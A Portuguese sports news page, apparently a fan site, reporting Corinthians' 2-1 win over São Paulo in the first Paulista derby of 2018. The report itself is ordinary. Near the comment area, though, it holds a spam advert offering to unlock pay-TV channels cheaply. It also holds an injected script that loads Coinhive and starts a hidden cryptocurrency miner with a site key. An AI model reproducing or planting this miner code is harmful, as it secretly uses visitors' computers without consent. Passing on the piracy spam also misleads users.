27/1/2018 19:20

Corinthians erra menos e derrota o São Paulo no primeiro clássico de 2018

Time de Fábio Carille aproveita entrosamento contra um Tricolor em reconstrução

Corinthians erra menos e derrota o São Paulo no primeiro clássico de 2018
Balbuena comemora o segundo gol do Corinthians (Foto: Marcos Ribolli)

O primeiro clássico paulista de 2018 terminou com vitória do time mais entrosado – e do que errou mesmo. Numa partida marcada por falhas defensivas, o Corinthians derrotou o São Paulo por 2 a 1, pela quarta rodada do Campeonato Paulista, com todos os gols anotados no primeiro tempo. O Corinthians lidera o grupo A, agora com 9 pontos. Apesar da derrota, o São Paulo também está na ponta do grupo B, com 4 pontos e um jogo a mais que os rivais.



O time de Fábio Carille voltou a mostrar em alguns momentos do Majestoso as melhores características de 2017. O São Paulo – que terminou o Brasileirão 12 posições e 22 pontos atrás do rival – deixou claro que é um time em reconstrução.

O primeiro lance da partida foi um retrato claro: parecia que os jogadores do São Paulo haviam se conhecido no vestiário. O time de Dorival Júnior conseguiu uma rara façanha. Deu a saída e tomou um gol com um minuto de partida. O sistema defensivo tricolor não apenas abriu todos os espaços ao Corinthians como indicou o caminho que o rival deveria seguir até o gol. Uma sucessão de erros, coroada com um golaço do Coritinhians.

Militão saiu para dar combate onde não precisava e deixou uma avenida às suas costas. Juninho Capixaba avançou por ali e encontrou Rodriguinho na meia-lua e livre, já que Rodrigo Caio havia saído para cobrir Militão e não foi coberto por ninguém. Sob os olhares (e só olhares) de Jucilei e Anderson Martins, Rodriguinho deu de primeira para Jadson, também de primeira, e também livre, fazer 1 a 0.

O São Paulo não se abalou com o gol sofrido tão cedo no jogo. A desorganização demonstrada no primeiro lance da partida não se repetia quando o Tricolor tinha a bola. O Corinthians sofria sobretudo pelo setor esquerdo de sua defesa, onde Pedro Henrique e Fabinho Capixaba nem de longe têm a mesma experiência (e entrosamento) de Balbuena e Fagner.

Militão quase marcou de cabeça após um escanteio da direita; depois de um troca de passes, Shaylon acertou a trave de Cássio. Depois de tanto insistir por ali, o São Paulo chegou ao empate. Militão cruzou rasteiro e a bola passou por nada menos que cinco jogadores do Corinthians – Fabinho Capixaba, Pedro Henrique, Balbuena, Fagner e Cassio – até encontrar Brenner livre do outro lado: 1 a 1.

Uma falha individual, de novo na defesa, voltaria a ser decisiva no primeiro clássico paulista de 2018. Clayson cobrou escanteio da direita e o São Paulo conseguiu marcar todos os jogadores do Corinthians, menos o seu melho cabeceador. Anderson Martins deixou Balbuena livre para testar ali perto da marca do pênalti, sem nenhuma chance para Sidão.

Brenner celebra gol de empate do São Paulo (Foto: Marcos Ribolli)

Se o primeiro tempo no Pacaembu foi de equilíbrio nas chances criadas, o segundo foi de protagonismo do visitante. Pressionado pelo placar, o São Paulo avançou suas linhas, manteve maior posse de bola e voltou a insistir em jogadas pelo lado direito. O domínio territorial tricolor mostrou-se inútil: Shaylon e Petros criaram pouco e Diego Souza raramente conseguiu se livrar da marcação.

O Corinthians demonstrou se sentir à vontade jogando no contra-ataque, mas também não conseguiu transformar em chances perigosas os espaços que o São Paulo eventualmente deixava. As trocas feitas por Dorival Júnior (Caíque por Brenner, Paulinho por Shaylon) e Fabio Carille (Júnior Dutra por Kazim, Rodriguinho por Maycon) não tiveram influência na dinâmica do jogo.

Após a metade do segundo tempo, o ritmo e qualidade da partida caíram drasticamente – natural para uma partida disputada em 27 de janeiro, a quarta do ano para os dois times. O São Paulo volta a campo na quarta-feira, quando estreia na Copa do Brasil contra o Madeureira, em Londrina. O Corinthians tem a primeira semana livre do ano. No próximo domingo, o Timão enfrenta o Novorizontino pelo Campeonato Paulista.


VEJA TAMBÉM
- Timão escalado para o jogo contra o Argentinos Juniors
- Reserva do Corinthians, Carlos Miguel é sondado por clubes do Brasil e da Europa
- Timão escalado para o jogo contra o Juventude









5265 visitas - Fonte: Globo Esporte

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade